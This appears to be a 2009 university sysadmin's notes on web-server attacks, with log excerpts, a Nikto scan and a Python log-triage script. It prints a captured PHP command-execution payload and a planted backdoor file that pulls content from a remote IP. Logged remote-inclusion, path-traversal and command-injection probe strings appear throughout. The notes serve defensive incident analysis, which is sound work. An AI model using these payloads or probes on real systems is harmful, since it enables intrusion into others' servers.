Table of Contents
attempts on the new server
attempts at bouncing off of server
logwatch clue:
404 errors:
/news.php?_SERVER[DOCUMENT_ROOT]=http://ww ... ote_log/ec.txt?: 1 Time(s)
[root@bacchus httpd]# grep 'ote_log/ec.txt' *
access_log.1:217.117.85.108 - - [10/May/2009:00:01:10 -0400] "GET /news/news.php?_SERVER[DOCUMENT_ROOT]=http://www.ionthenet.co.kr/note_log/ec.txt? HTTP/1.1" 200 22071
access_log.1:217.117.85.108 - - [10/May/2009:00:01:10 -0400] "GET /news.php?_SERVER[DOCUMENT_ROOT]=http://www.ionthenet.co.kr/note_log/ec.txt? HTTP/1.1" 404 5275
ec.txt
<?php
echo "Mic22";
$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd;
function ex($cfe){
    $res = '';
    if (!empty($cfe)){
        if(function_exists('exec')){
            @exec($cfe,$res);
            $res = join("\n",$res);
        }
        elseif(function_exists('shell_exec')){
            $res = @shell_exec($cfe);
        }
        elseif(function_exists('system')){
            @ob_start();
            @system($cfe);
            $res = @ob_get_contents();
            @ob_end_clean();
        }
        elseif(function_exists('passthru')){
            @ob_start();
            @passthru($cfe);
            $res = @ob_get_contents();
            @ob_end_clean();
        }
        elseif(@is_resource($f = @popen($cfe,"r"))){
            $res = "";
            while(!@feof($f)) { $res .= @fread($f,1024); }
            @pclose($f);
        }
    }
    return $res;
}
exit;
hacked files on old server
Need to check ./hps-html/vids/thumbs/index.php
[root@bacchus www]# find . -user apache -iname index.php -exec ls -Flat {} \;
-rwxrw-r-- 1 apache web-admin 3008 Jul 13 2005 ./aoe-html/computing/faq/index.php*
-rw-rw-r-- 1 apache web-admin 1302 Aug 23 2005 ./aoe-html/computing/manuals/index.php
-rwxrw-r-- 1 apache web-admin 1162 Aug 23 2005 ./aoe-html/computing/index.php*
-rw-r--r-- 1 apache apache 18126 Nov 29 2006 ./aoe-html/organizations/vtsgt/delete this folder/index.php
-rwxrwxr-x 1 apache web-admin 3038 Jan 23 2006 ./aoe-html/research/facilities/dyppir/index.php*
-rw-r--r-- 1 apache apache 168 Apr 15 03:07 ./hps-html/vids/thumbs/index.php
-rwxrw-r-- 1 apache web-admin 2272 Jan 31 2006 ./secure-html/computing/online/index.php*
[root@bacchus www]# cat ./hps-html/vids/thumbs/index.php
<?php
error_reporting(0);
if (isset($_GET["p"])){
$zipfile = file_get_contents("http://72.9.108.202/doors/vt01/canadian/".$_GET["p"].".html");
echo $zipfile;
}
?>
files dropped in these locations, which were writable by apache:
www.sssl.aoe.vt.edu/documentation/hardware_components/top
www.sssl.aoe.vt.edu/simplePHPblog/
www.aoe.vt.edu/organizations/aiaa/lutze
www.aoe.vt.edu/organizations/vtsgt
nikto report
[root@traininglt nikto]# ./nikto.pl -host 128.173.188.87
- Nikto v2.03/2.04
---------------------------------------------------------------------------
+ Target IP: 128.173.188.87
+ Target Hostname: bacchus.ipv4.aoe.vt.edu
+ Target Port: 80
+ Start Time: 2009-05-12 15:34:28
---------------------------------------------------------------------------
+ Server: Apache/2.2.3 (Scientific Linux)
- /robots.txt - contains 3 'disallow' entries which should be manually viewed. (GET)
+ No CGI Directories found (use '-C all' to force check all possible dirs)
- Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE
+ OSVDB-877: HTTP method ('Allow' Header): 'TRACE' is typically only used for debugging and should be disabled. This message does not mean it is vulnerable to XST.
+ OSVDB-0: Retrieved X-Powered-By header: PHP/5.1.6
+ OSVDB-0: ETag header found on server, inode: 32375282, size: 111, mtime: 0xb976d0c0
+ Apache/2.2.3 appears to be outdated (current is at least Apache/2.2.9). Apache 1.3.39 and 2.0.61 are also current.
+ OSVDB-637: GET /~root - Enumeration of users is possible by requesting ~username (responds with 'Forbidden' for users, 'not found' for non-existent users).
+ OSVDB-0: GET /index.php?module=My_eGallery : My_eGallery prior to 3.1.1.g are vulnerable to a remote execution bug via SQL command injection.
+ OSVDB-877: TRACE / : TRACE option appears to allow XSS or credential theft. See http://www.cgisecurity.com/whitehat-mirror/WhitePaper_screen.pdf for details
+ OSVDB-12184: GET /index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000 : PHP reveals potentially sensitive information via certain HTTP requests which contain specific QUERY strings.
+ OSVDB-3092: GET /phpmyadmin/ : phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ OSVDB-3092: GET /phpMyAdmin/ : phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ OSVDB-3093: GET /index.php?base=test%20 : This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: GET /index.php?IDAdmin=test : This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: GET /index.php?pymembs=admin : This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: GET /index.php?SqlQuery=test%20 : This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: GET /index.php?tampon=test%20 : This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: GET /index.php?topic=&lt;script&gt;alert(document.cookie)&lt;/script&gt;%20 : This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3268: GET /icons/ : Directory indexing is enabled: /icons
+ OSVDB-3233: GET /icons/README : Apache default file found.
+ 3577 items checked: 20 item(s) reported on remote host
+ End Time: 2009-05-12 15:35:07 (39 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
Test Options: -host 128.173.188.87
--------------------------------------------------------------------------
WWW2
[root@webtest ~]# grep "sciencedirect" /var/log/httpd/*
/var/log/httpd/access_log.3:218.246.113.84 - - [25/Apr/2009:05:24:19 -0400] "GET http://www.sciencedirect.com/ HTTP/1.1" 200 25042 "-" "Mozilla/5.0 (compatible; MSIE 5.01; Win2000)"
/var/log/httpd/access_log.4:58.252.189.17 - - [16/Apr/2009:09:56:03 -0400] "GET http://www.sciencedirect.com/science/subscriptionSummary/4875/J HTTP/1.1" 404 328 "-" "Mozilla/5.0 (compatible; MSIE 5.01; Win2000)"
/var/log/httpd/access_log.4:219.231.151.44 - - [18/Apr/2009:05:36:10 -0400] "GET http://www.sciencedirect.com/ HTTP/1.1" 200 25068 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)"
*Above appears to be an attempt to use us as a proxy to get to sciencedirect.com, which may filter by IP address; our address would allow access because it is a Virginia Tech Libraries resource.
**Recommended Action: block URI requests via mod_rewrite in htaccess
I can't answer your root question, but here's a band-aid (requires mod_rewrite):
RewriteEngine on
RewriteRule ^/?http:// - [F]
This will send a 403-Forbidden response for any request for "http://" or "/http://" followed by any URI.
"GET /phpMyAdmin-2.6.1-rc2/main.php HTTP/1.0" 404 316 "-" "-"
*These are ok to ignore, phpMyAdmin is installed but only accessible to us
"SEARCH /\x90\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\...\x90\x90\x90\x90...
*This was an attempt to attack via an IIS vulnerability, no worries here, we're not using a Windows based web server
"GET /thisdoesnotexistahaha.php HTTP/1.1"
*This is an attempt to get the type of webserver and OS being used
*Solution:
> Why don't you create a file with that name, or at least a redirect
> statement in httpd.conf, that redirects the request to
> "yesitdoeshehe.php". ;)
% cat > yesitdoeshehe.php
#!/bin/bash
echo 'Content-type: text/plain'
echo
echo These are not the PHP scripts you are looking for.
exit 0
^D
% chmod +x yesitdoeshehe.php
"GET /xmlrpc.php HTTP/1.0" ; "GET /*/main.php"
*Attempt to exploit an xmlrpc vulnerability via remote sql injection
*We're safe here, fixed in php 5.0.5 and we're on 5.1.6
May 10, 2009 Log Analysis
Bacchus 05/10/2009 Log Review
=============================
80.179.24.50 /index.php?inc=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP Response 200
An attempt to read the /proc/self/environ file; fails, does nothing but take the user to the main page.
///skin/zero_vote/login.php?dir=http://fst ... ditors/id.txt??: 1 Time(s)
I cannot tell what this one is doing, unable to find any information other than reports of others having this entry in their logs as well
**Keep an eye on this one until we know what it does
//favorites.php?nuke_bb_root_path=http://h ... age/img/image??: 1 Time(s)
Vulnerability in the PHP-Nuke platform, we don't use this.
//templates/beez/index.php?act=http://www. ... /v6id.txt??????: 1 Time(s)
Again, can't find any relevant information on this entry
**Keep a watch on it
/MSOffice/cltreq.asp?UL=1&ACT=4&BUILD=4518 ... MVER=4&CAPREQ=0
Harmless, used by IE to determine if Office Server Extensions are enabled
/_vti_bin/owssvr.dll?UL=1&ACT=4&BUILD=4518 ... MVER=4&CAPREQ=0
Something to do with Exchange 2003, don't think this concerns us but keep a watch out for it again
/academics/?PHPSESSID=6df789551664bd593103f8ccb27191c5
Traces back to Google, perhaps its crawler? Actually it's the same IP and PHPSESSID for each entry in the log where this occurs, which leads me to believe it is the Google crawler
/alumni/alumnilist.php?class=http://144.20 ... 666/index.html?
...No clue, traces back to Amsterdam
/alumni/main/at/?continental-airline-tickets-3/: 1 Time(s)
/alumni/main/at/?last-minute-airline-tickets-3/: 1 Time(s)
**IP traces back to Yahoo, possibly its crawler?**
/awstats.pl?configdir=%7Cecho%20;echo%20;i ... o%20;echo%20%7C
We don't appear to use awstats
/calendars/windtunnel/index.php?PHPSESSID= ... on=comment1%2C+: 20 Time(s)
/calendars/windtunnel/index.php?PHPSESSID= ... on=comment2%2C+: 8 Time(s)
/calendars/windtunnel/index.php?PHPSESSID= ... on=comment3%2C+: 20 Time(s)
/calendars/windtunnel/index.php?PHPSESSID= ... on=comment4%2C+: 11 Time(s)
/calendars/windtunnel/index.php?PHPSESSID= ... on=comment5%2C+: 20 Time(s)
/calendars/windtunnel/index.php?PHPSESSID= ... on=comment6%2C+: 12 Time(s)
**No idea, tracing back to Amsterdam, all returning 404's
/cgi-bin/acart/acart.pl?&page=%7Cuname%20-a;pwd;id%7C
Hard to find information, however it is a known exploit (php injection), worth looking into.
*When adding files back, check if they're cgi.
/cgi-bin/awstats.pl?configdir=%7Cecho%20;e ... o%20;echo%20%7C
Again with awstats, need to check if we do have it
/cgi-bin/index.cgi?page=%7Cuname%20-a;id%7C: 1 Time(s)
Again back to Amsterdam
/cgi-bin/kerbynet?Section=NoAuthREQ&Action ... ype=*%22;id;%22: 1 Time(s)
Amsterdam again, allows remote execution of code on ZeroShell
***Go through and check for all cgi occurrences, foreign hits on many of them***
/errors.php?error=http://www.ayj.ca/buggsbunny??
Unsure, traces back to Amsterdam, Latin America
/horde/services/help/?show=about&module=;% ... thru(%22id%22);
Attempted attack on a mail system, we don't use it
/labsupport/labequipment.php?selfimageresi ... e=400&ysize=200
Don't think this is anything to worry about, looks like just trying to load images onto a page that are resized by a php script
/organizations/aiaa/index.php?go=calendar/ ... o/pics/id.txt??
Looks normal after all.
/organizations/index.php?inc=../../../../. ... oc/self/environ: 1 Time(s)
/organizations/index.php?inc=../../../../. ... self/environ%00: 1 Time(s)
Trying to access the environ file again, still didn't work
/organizations/sname/ingalls02pics/plas%25 ... 2520cutting.jpg: 2 Time(s)
Look normal after all
/organizations/vtsgt/index.php?inc=../../. ... oc/self/environ: 1 Time(s)
Again a failure
/people/include/vtweb_html_1.12/assets/js/widgets.js: 81 Time(s)
Just a bug in our code
/saffairs/pages/s/?free-credit-score-no-credit-card-3/: 1 Time(s)
Yahoo! crawler, interesting hit though
/services/help/?show=about&module=;%22.passthru(%22id%22);
Amsterdam again. Another horde attempt, we don't use it, so no worries here.
/twiki/bin/configure?action=image;image=%7Cid%7C;type=text
Amsterdam.
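The same handful of probe types recur across the logwatch clue at the top of the page, the WWW2 entries and this review: a parameter whose value is an http URL to a .txt payload (the `_SERVER[DOCUMENT_ROOT]=` and `?dir=`/`?inc=` hits), traversal to /proc/self/environ with a trailing %00, absolute URLs as the request target (the sciencedirect proxy attempts), shell commands inside CGI parameters (awstats, acart, kerbynet, horde) and the IIS SEARCH probe. The script below is an added example, not a tool from these notes: it parses Apache access-log lines in the format shown on this page and tags each one with the probe type, marking probes that drew a 200 so they can be checked against the script they hit. The sample lines, IPs and payload host are constructed to resemble the entries in the notes, and the tag names are my own.

```python
"""Triage Apache access-log lines for the probe types seen in these notes.

Added example, not part of the original notes. Tags: "rfi" (a query value that
is an http(s) URL, as in _SERVER[DOCUMENT_ROOT]=http://.../ec.txt?), "lfi-traversal"
(../, /proc/self/environ, %00), "proxy-abuse" (absolute URL as request target),
"cmd-injection" (shell metacharacters plus a command in the query, as in the
awstats/acart/kerbynet hits), "iis-binary-probe" (SEARCH with \x90 padding) and
"served-200" (the probe drew a 200 and should be checked against the script it hit).
"""
import re
from urllib.parse import parse_qsl, unquote

# Apache common/combined log prefix; the referer/user-agent tail is not needed here.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)(?: (?P<proto>[^"]+))?" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)
CMD_RE = re.compile(r'[|;]\s*(?:id|uname|pwd|ls|cat|echo|wget|curl)\b|passthru\s*\(|system\s*\(', re.I)

def parse_line(line):
    """Return the log fields as a dict, or None if the line is not an access-log entry."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    entry["status"] = int(entry["status"])
    return entry

def classify(entry):
    """Tags for one parsed entry; an empty list means nothing in it looked like a probe."""
    tags = []
    target = entry["target"]
    # Decode twice: scanners double-encode, and %00 only becomes visible after decoding.
    decoded = unquote(unquote(target))
    if entry["method"].upper() == "SEARCH" and "\\x90" in target:
        tags.append("iis-binary-probe")          # Apache logs raw bytes as \xNN escapes
    if re.match(r'https?://', target, re.I):
        tags.append("proxy-abuse")
    _path, _sep, query = decoded.partition("?")
    if any(re.match(r'\s*https?://', v, re.I) for _k, v in parse_qsl(query, keep_blank_values=True)):
        tags.append("rfi")
    if "\x00" in decoded or "/proc/self/environ" in decoded or "../" in decoded:
        tags.append("lfi-traversal")
    if CMD_RE.search(decoded):
        tags.append("cmd-injection")
    if tags and entry["status"] == 200:
        tags.append("served-200")
    return tags

def triage(lines):
    """Parse and classify each line; return (ip, status, target, tags) for flagged lines only."""
    hits = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        tags = classify(entry)
        if tags:
            hits.append((entry["ip"], entry["status"], entry["target"], tags))
    return hits

def tag_counts(hits):
    """How many flagged lines carry each tag, for a quick logwatch-style summary."""
    counts = {}
    for _ip, _status, _target, tags in hits:
        for tag in tags:
            counts[tag] = counts.get(tag, 0) + 1
    return counts

# Constructed sample lines modelled on the entries in the notes (placeholder hosts/IPs).
SAMPLE_LOG = r"""
203.0.113.10 - - [10/May/2009:00:01:10 -0400] "GET /news.php?_SERVER[DOCUMENT_ROOT]=http://payload.example/note_log/ec.txt? HTTP/1.1" 404 5275
203.0.113.11 - - [10/May/2009:03:12:41 -0400] "GET /index.php?inc=../../../../../../proc/self/environ%00 HTTP/1.1" 200 8120
203.0.113.12 - - [25/Apr/2009:05:24:19 -0400] "GET http://www.sciencedirect.com/ HTTP/1.1" 200 25042 "-" "Mozilla/5.0 (compatible; MSIE 5.01; Win2000)"
203.0.113.13 - - [12/May/2009:08:00:00 -0400] "GET /cgi-bin/acart/acart.pl?&page=%7Cuname%20-a;pwd;id%7C HTTP/1.1" 404 5200
203.0.113.13 - - [12/May/2009:08:00:01 -0400] "SEARCH /\x90\x04H\x04H\x04H\x90\x90\x90 HTTP/1.1" 414 300
198.51.100.7 - - [12/May/2009:08:05:00 -0400] "GET /research/?area_id=3 HTTP/1.1" 200 11835
""".strip().splitlines()

if __name__ == "__main__":
    for ip, status, target, tags in triage(SAMPLE_LOG):
        print(f"{ip:15} {status} {','.join(tags):30} {target[:60]}")
    print(tag_counts(triage(SAMPLE_LOG)))
```

Run it over a real access_log with `triage(open("access_log"))`; the "served-200" tag is the one worth reading first, because a 200 on an inclusion probe means the request reached a script that accepted the parameter (as the news.php hit on 10 May did), whereas 404s are scanner noise.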
May 13, 2009 Log Analysis
404's
/%7eyongkm/java/thin/: 1 Time(s)
79.23.132.70 - - [12/May/2009:21:05:42 -0400] "GET /%7eyongkm/java/thin/ HTTP/1.1" 404 6624
[stedwar1@hephaistos ~]$ host 79.23.132.70
70.132.23.79.in-addr.arpa domain name pointer host70-132-dynamic.23-79-r.retail.telecomitalia.it.
///skin/zero_vote/ask_password.php?dir=htt ... schmasik.txt???: 2 Time(s)
210.118.194.200 - - [12/May/2009:05:34:28 -0400] "GET /~mason/Mason_f/747CONF.INP%20///skin/zero_vote/ask_password.php?dir=http://203.253.145.192/zb41//skin/zero_vote/ruschmasik.txt??? HTTP/1.1" 404 5311
210.118.194.200 - - [12/May/2009:05:34:28 -0400] "GET ///skin/zero_vote/ask_password.php?dir=http://203.253.145.192/zb41//skin/zero_vote/ruschmasik.txt??? HTTP/1.1" 404 5271
210.118.194.200 - - [12/May/2009:05:34:28 -0400] "GET /~mason/Mason_f///skin/zero_vote/ask_password.php?dir=http://203.253.145.192/zb41//skin/zero_vote/ruschmasik.txt??? HTTP/1.1" 404 5247
//DOCUMENT_ROOT=http://irc.harazuku.co.cc/ ... sponz/id2.txt??: 4 Time(s)
199.120.90.222 - - [12/May/2009:12:55:14 -0400] "GET /~cwoolsey/Courses/AOE3134/Supplemental/RootLocusTechnique.pdf//DOCUMENT_ROOT=http://irc.harazuku.co.cc/2002/.sh/responz/id2.txt?? HTTP/1.1" 404 5297
//ee_commerce/paypalcart.php?toroot=http:/ ... /cms//uiu.txt??: 3 Time(s)
//gmapfactory/params.php?gszAppPath=http:/ ... alog/safe1.txt?: 1 Time(s)
//skin/zero_vote/error.php?%20dir=http://l ... .mw.lt/id.txt??: 1 Time(s)
//skin/zero_vote/setup.php?%20dir=http://d ... wap.sh/id.txt??: 2 Time(s)
//sources/join.php?FORM[url]=owned&CONFIG[ ... /vip/id2.txt???: 1 Time(s)
//surveys/survey.inc.php?path=http://www.r ... %20%20/id.txt??: 1 Time(s)
/3DLDV/wb23000/data.html: 1 Time(s)
/MSOffice/cltreq.asp?UL=1&ACT=4&BUILD=4518 ... MVER=4&CAPREQ=0: 1 Time(s)
/MSOffice/cltreq.asp?UL=1&ACT=4&BUILD=6403 ... MVER=4&CAPREQ=0: 1 Time(s)
/MSOffice/cltreq.asp?UL=1&ACT=4&BUILD=8164 ... MVER=4&CAPREQ=0: 2 Time(s)
/_vti_bin/owssvr.dll?UL=1&ACT=4&BUILD=4518 ... MVER=4&CAPREQ=0: 1 Time(s)
/_vti_bin/owssvr.dll?UL=1&ACT=4&BUILD=6403 ... MVER=4&CAPREQ=0: 1 Time(s)
/_vti_bin/owssvr.dll?UL=1&ACT=4&BUILD=8164 ... MVER=4&CAPREQ=0: 2 Time(s)
/_vti_bin/shtml.exe/_vti_rpc: 9 Time(s)
/_vti_inf.html: 9 Time(s)
/alumni/alumnilist.php?class=1983&PHPSESSI ... d54ef3dc75f883d: 1 Time(s)
/calendars/windtunnel/index.php?PHPSESSID= ... on=comment1%2C+: 7 Time(s)
/calendars/windtunnel/index.php?PHPSESSID= ... on=comment2%2C+: 9 Time(s)
/calendars/windtunnel/index.php?PHPSESSID= ... on=comment3%2C+: 8 Time(s)
/calendars/windtunnel/index.php?PHPSESSID= ... on=comment4%2C+: 7 Time(s)
/calendars/windtunnel/index.php?PHPSESSID= ... on=comment5%2C+: 9 Time(s)
/calendars/windtunnel/index.php?PHPSESSID= ... on=comment6%2C+: 17 Time(s)
/cgi-bin/mt/mt-comments.cgi: 6 Time(s)
/cgi-bin/mt/mt-comments.cgi?entry_id=1329: 1 Time(s)
/cgi-bin/mt/mt-comments.cgi?entry_id=1330: 1 Time(s)
/cgi-bin/mt/mt-comments.cgi?entry_id=1331: 2 Time(s)
/cgi-bin/mt/mt-comments.cgi?entry_id=699: 1 Time(s)
/cgi-bin/mt/mt-tb.cgi?__mode=view&entry_id=1329: 1 Time(s)
/cgi-bin/mt/mt-tb.cgi?__mode=view&entry_id=1330: 1 Time(s)
/cgi-bin/mt/mt-tb.cgi?__mode=view&entry_id=1331: 1 Time(s)
/classes/aoe3054/: 2 Time(s)
/classes/aoe3054?PHPSESSID=1939caa884433834315b4a00b6e35ac0: 1 Time(s)
/classes/aoe3054?PHPSESSID=1c7615b28cf141183322809db94ce0a4: 1 Time(s)
/classes/aoe3054?PHPSESSID=7916107b13fccab81eb4211c633deccf: 1 Time(s)
/classes/aoe3054?PHPSESSID=981a9739aad37ad1536582db69788eae: 1 Time(s)
/cms/components/com_joomlaboard/faq.php: 1 Time(s)
/cms/components/com_mamboboard/faq.php: 1 Time(s)
/components/com_joomlaboard/faq.php: 1 Time(s)
/components/com_mamboboard/faq.php: 1 Time(s)
/computing/: 2 Time(s)
/computing/faq/displayfaq.php?area_id=3: 1 Time(s)
/computing/faq/displayfaq.php?area_id=6: 1 Time(s)
/password.php?skin_board_path=http://www.i ... /upload/ec.txt?: 1 Time(s)
/people.html: 1 Time(s)
/people/bgfac.html: 3 Time(s)
/people/clifffac.html: 1 Time(s)
/people/davenfac.html: 2 Time(s)
/people/include/vtweb_html_1.12/assets/js/widgets.js: 1 Time(s)
/people/josfac.html: 2 Time(s)
/people/masfac.html: 5 Time(s)
/people/robfac.html: 1 Time(s)
/research/?area_id=2: 1 Time(s)
/research/?area_id=3: 1 Time(s)
/research/?area_id=4: 1 Time(s)
/research/?area_id=6: 1 Time(s)
/research/thesis/?mode=area_selected&thesis_area=3: 1 Time(s)
/research/thesis/?mode=area_selected&thesis_area=4: 1 Time(s)
/research/thesis/?mode=area_selected&thesis_area=6: 1 Time(s)
/research/thesis/index.php?mode=area_selected&thesis_area=2: 1 Time(s)
/research/thesis/index.php?mode=area_selected&thesis_area=3: 1 Time(s)
/research/thesis/index.php?mode=area_selected&thesis_area=5: 1 Time(s)
/research/thesis/index.php?mode=area_selected&thesis_area=6: 1 Time(s)
/saffairs/pages/r/?canada-free-credit-report-2/: 1 Time(s)
/shop/locale/?Aarp-health-insurance-5/: 1 Time(s)
/site/components/com_joomlaboard/faq.php: 1 Time(s)
/site/components/com_mamboboard/faq.php: 1 Time(s)
/usr/local/lib/netscape/docs/images/poweredsgi.GIF: 2 Time(s)
/wordtrans/wordtrans.php: 1 Time(s)
/~cwoolsey//ee_commerce/paypalcart.php?tor ... /cms//uiu.txt??: 3 Time(s)
/~cwoolsey/Advisees//ee_commerce/paypalcar ... /cms//uiu.txt??: 3 Time(s)
/~cwoolsey/Advisees/Undergraduate//ee_comm ... /cms//uiu.txt??: 3 Time(s)
/~cwoolsey/Advisees/Undergraduate/FaruqueA ... /cms//uiu.txt??: 3 Time(s)
/~cwoolsey/Courses/3104: 1 Time(s)
/~cwoolsey/Courses/AOE3034/index_files/editdata.mso: 1 Time(s)
/~cwoolsey/Courses/AOE3134/Supplemental//D ... sponz/id2.txt??: 4 Time(s)
/~cwoolsey/Courses/AOE3134/Supplemental/Ro ... sponz/id2.txt??: 4 Time(s)
/~dare/me/punk/rocker.html: 1 Time(s)
/~grasmeye/photos/allison/billstory.html: 1 Time(s)
/~gurdal/Public/COURSES/4084-Docs/..%5C408 ... CTutorial-09.nb: 1 Time(s)
/~gurdal/Public/COURSES/4084-Docs/..%5C408 ... WORK%5CHW03.pdf: 1 Time(s)
/~gurdal/Public/COURSES/5064-Docs/TUTORIALS/IPLamDes.nb: 1 Time(s)
/~gurdal/gurdal.gif: 2 Time(s)
/~hokiesat/Presentations_and_Papers/AFRL%2 ... orqueValues.pdf: 1 Time(s)
/~hokiesat/subs/software/ION-F%20Software% ... ation%20Set.doc: 1 Time(s)
/~hokiesat/subs/systems/HokieSatDocMatrix_files/oledata.mso: 1 Time(s)
/~hokiesat/subs/systems/ION-FMassSS.xls: 1 Time(s)
/~hokiesat/subs/wiring/New%20Stuff/Update% ... /upload/ec.txt?: 1 Time(s)
/~hokiesat/subs/wiring/New%20Stuff/passwor ... /upload/ec.txt?: 1 Time(s)
/~hokiesat/subs/wiring/password.php?skin_b ... /upload/ec.txt?: 1 Time(s)
/~lscharf/scripts//surveys/survey.inc.php? ... %20%20/id.txt??: 1 Time(s)
/~mason//ee_commerce/paypalcart.php?toroot ... /cms//uiu.txt??: 3 Time(s)
/~mason//skin/zero_vote/error.php?%20dir=h ... .mw.lt/id.txt??: 1 Time(s)
/~mason//skin/zero_vote/setup.php?%20dir=h ... wap.sh/id.txt??: 2 Time(s)
/~mason/Mason//sources/join.php?FORM[url]= ... /vip/id2.txt???: 1 Time(s)
/~mason/Mason/ACiFlyWngs.html/: 1 Time(s)
/~mason/Mason/ACinfoTOC.html%22%20%20targe ... /vip/id2.txt???: 1 Time(s)
/~mason/Mason/ACinfoTOC.html//sources/join ... /vip/id2.txt???: 1 Time(s)
/~mason/Mason/http%20://www.aoe.vt.edu/~ma ... /ACinfoTOC.html: 1 Time(s)
/~mason/Mason_f/(null): 1 Time(s)
/~mason/Mason_f///skin/zero_vote/ask_passw ... schmasik.txt???: 2 Time(s)
/~mason/Mason_f//ee_commerce/paypalcart.ph ... /cms//uiu.txt??: 3 Time(s)
/~mason/Mason_f//skin/zero_vote/error.php? ... .mw.lt/id.txt??: 1 Time(s)
/~mason/Mason_f//skin/zero_vote/setup.php? ... wap.sh/id.txt??: 2 Time(s)
/~mason/Mason_f/747CONF.INP%20%20//skin/ze ... wap.sh/id.txt??: 1 Time(s)
/~mason/Mason_f/747CONF.INP%20///skin/zero ... schmasik.txt???: 2 Time(s)
/~mason/Mason_f/747CONF.INP//skin/zero_vot ... .mw.lt/id.txt??: 1 Time(s)
/~mason/Mason_f/747CONF.INP//skin/zero_vot ... wap.sh/id.txt??: 1 Time(s)
/~mason/Mason_f/CAtxtTop.html%0dCAtxtTop.html%20%a0%0dpaper.: 1 Time(s)
/~mason/Mason_f/M96SAE.pdf%20%20//skin/zer ... wap.sh/id.txt??: 1 Time(s)
/~mason/Mason_f/M96SAE.pdf//skin/zero_vote ... .mw.lt/id.txt??: 1 Time(s)
/~mason/Mason_f/M96SAE.pdf//skin/zero_vote ... wap.sh/id.txt??: 1 Time(s)
/~mason/Mason_f/M96SC02.pdf/: 1 Time(s)
/~mason/Mason_f/M96SC10.pdf%22%20%20lang=% ... _w/safe1.txt???: 2 Time(s)
/~mason/Mason_f/MorphFinalRptF03.pdf//ee_c ... /cms//uiu.txt??: 3 Time(s)
405 Method Not Allowed
/~mason/: 4 Time(s)
May 14, 2009 Log Analysis
A total of 5 sites probed the server
194.83.8.126 209.87.194.21 222.124.24.77 85.241.14.188 87.106.253.45
Requests with error response codes
400 Bad Request
/: 1 Time(s)
403 Forbidden
/: 7 Time(s)
/bannerimages/: 1 Time(s)
/bannerimages/campioli/thumb3.jpg: 1 Time(s)
/bannerimages/campioli/thumb5.jpg: 1 Time(s)
/bannerimages/caplab/thumb1.jpg: 2 Time(s)
/bannerimages/caplab/thumb2.jpg: 2 Time(s)
/bannerimages/caplab/thumb3.jpg: 1 Time(s)
/bannerimages/caplab/thumb4.jpg: 1 Time(s)
/bannerimages/caplab/thumb5.jpg: 1 Time(s)
/bannerimages/casper/thumb1.jpg: 1 Time(s)
/bannerimages/hpc/thumb5.jpg: 1 Time(s)
/bannerimages/ldv: 1 Time(s)
/bannerimages/ldv/ldv_full.jpg: 1 Time(s)
/bannerimages/ldv?PHPSESSID=1c7615b28cf141183322809db94ce0a4: 1 Time(s)
/bannerimages/ldv?PHPSESSID=22cc899a2ed407ea5541c6c32983a5bc: 1 Time(s)
/bannerimages/ldv?PHPSESSID=39009e253e4feede42a7520c2fcf3bb5: 1 Time(s)
/bannerimages/ldv?PHPSESSID=f859e1faff216a325754f18ce8f8fc42: 1 Time(s)
/bannerimages/nsl/iambus_www.jpg: 1 Time(s)
/bannerimages/orange_effect?PHPSESSID=4755 ... 633b481e5eecf69: 1 Time(s)
/bannerimages/orange_effect?PHPSESSID=9a26 ... e78794c0e442bb9: 1 Time(s)
/bannerimages/orange_effect?PHPSESSID=ff6c ... 3f3241c117c4568: 1 Time(s)
/bannerimages/phantom/thumb1.jpg: 2 Time(s)
/bannerimages/phantom/thumb2.jpg: 1 Time(s)
/bannerimages/phantom/thumb3.jpg: 1 Time(s)
/bannerimages/phantom/thumb4.jpg: 1 Time(s)
/bannerimages/sssl/hokiesat.jpg: 1 Time(s)
/bannerimages/tbw/lmas_full.jpg: 1 Time(s)
/bannerimages/tbw/lmas_www.jpg: 1 Time(s)
/bannerimages/volant/thumb1.jpg: 1 Time(s)
/bannerimages/volant?PHPSESSID=47a86f49197 ... 69d89baee522cef: 1 Time(s)
/bannerimages/volant?PHPSESSID=fe410b64284 ... 27088160dead814: 1 Time(s)
/bannerimages/vtsrp/ignition.jpg: 1 Time(s)
/bannerimages/vtsrp/offrail.jpg: 1 Time(s)
/bannerimages/vtsrp/thumb2.jpg: 1 Time(s)
/bannerimages/vtsrp/thumb3.jpg: 1 Time(s)
/classes/aoe3054?PHPSESSID=1c7615b28cf141183322809db94ce0a4: 1 Time(s)
/classes/aoe3054?PHPSESSID=4755f3e63308bb81f633b481e5eecf69: 1 Time(s)
/classes/aoe3054?PHPSESSID=6df789551664bd593103f8ccb27191c5: 1 Time(s)
/classes/aoe3054?PHPSESSID=7916107b13fccab81eb4211c633deccf: 1 Time(s)
/classes/aoe3054?PHPSESSID=a85cdd6ec52ddb3008600f78659ba4a8: 1 Time(s)
/favicon.ico: 2 Time(s)
/giving/: 1 Time(s)
/help: 1 Time(s)
/index.php: 1 Time(s)
/robots.txt: 38 Time(s)
/teststeve.txt: 1 Time(s)
/~cdhall/Research/RossIM/AAS03262.bbl: 1 Time(s)
/~cdhall/Research/aiaa.bst: 1 Time(s)
/~cdhall/Research/gyrostatsearch.doc: 1 Time(s)
/~cdhall/courses/exams/LagrangianPrime.aux: 1 Time(s)
